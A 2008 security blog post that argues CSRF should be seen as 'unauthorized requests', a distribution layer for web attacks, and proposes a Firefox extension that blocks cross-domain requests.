The Snare Of Unauthorized Requests
April 21, 2008 – 8:02 AMAlmost everyone knows what CSRF or better unauthorized requests are. I never really embraced CSRF as the correct term for unauthorized request issues, because the term is outdated and inadequate to contemporary hacking. For me, an unauthorized request is the layer or automation of a hacking procedure without direct interference of the hacker. I usually illustrate this by comparing unauthorized requests to a trap, or snare utilized by survivors or hunters. It is automated to catch, and the victim will trigger his own capture due the the automation. There isn’t a lot of skills involved here, it is easy to set up. The only thing an attacker needs to do is wait.
Webapplication vulnerabilities.
Most vulnerabilities are due to unauthorized requests being made. Almost all cross site scripting attacks are only useful when a unauthorized request is made. In order to do something more useful than to print alert boxes, attackers need to make remote, or non-same origin requests. Like logging cookies, phoning home, or requesting a worm. SQL injection can be achieved also by unauthorized requests due to the fact that it’s a verbatim GET request. When I am very strict, I’ll even say that SQL injection is also request abuse of the programming layer. In this case, the program of software is the victim of unauthorized requests. Even many vulnerabilities that are designed to exploit browsers do sometimes rely on unauthorized requests in the architecture of the browser, like calling system function or simply browser internals which should not be exposed in a secure browser.
So CSRF or unauthorized requests are multi-dimensional, and can appear in any place. It’s very important to understand the notion that it is only a distribution layer for the actual payload. Whether it be session stealing, cookie stealing or a complete automated reconfiguration of your router. The attack is automated, instead of directly targeted like most network attacks are. With this in mind, I like to stress the importance of the distribution layer instead of it’s payload. Without distribution, the payload cannot be transported. Hence the distribution layer must be flawed. Preventing unauthorized requests should be the focus in web application security, because we can continue to invent new rules, signatures, and vectors, but as we all learn that is an arms-race which is very difficult to win, and it won’t stop unknown attacks yet to be invented.
TCP/IP and browsers.
Somehow along the road, everyone thought it was normal to hotlink images or scripts from other networks into your own network. This explicitly violates a very crucial same-origin policy rule. In fact, it violates all security restrictions. If the same origin policy means anything it, it means that networks should not interact verbatim, but only on strict rules. This is exactly what is wrong with the Internet as a whole. It’s all connected together and browsers/email clients allow multiple requests from a single origin, which results in the issues we face these days. For what reason, do we fetch data from other servers while we can serve the data itself? I cannot think of any valid reason why we should fetch data and include it in our own network, or browser client. Is there any valid reason why my browser should be allowed to access my file system? My browser can be tricked into making unauthorized requests by creating a HTML email, and it got all browser permissions since it’s tricked into thinking we requested it. why isn’t there another application that is strictly designed to navigate the file system, and the browser only for outside networks? Why should my browser fetch Flash or Javascript from servers that are not same-domain? Why don’t we block it all?
Solutions.
I hear you, it will break the features. Screw the features, that is an excuse. There isn’t anything I cannot do without requesting 3rd party information on a website. So what is the solution? I gave it many thoughts, and I came to the conclusion that it’s up to the browser vendors to enforce content policies. I am not sure how their efforts are in this region, and since I do not want to wait I announced that I am starting to build an extension for Firefox that enforces content restrictions, or better: restricts all unauthorized requests that are requested beyond the same domain scope. If successful, the only attacks remain attacks that are performed on the same origin domain. That cannot be stopped, but again when you want to do something interesting you still need to make requests beyond the same origin to store or log the stolen data. So it leaves us only with low level attacks, and notably phishing which isn’t a security issue but a user-learning issue.
There are little drawbacks actually, a machine must do what I tell him to, not the other way around. So stopping unauthorized requests at it’s roots is the bare minimum to me.
Source: 0x000000
You must be logged in to post a comment.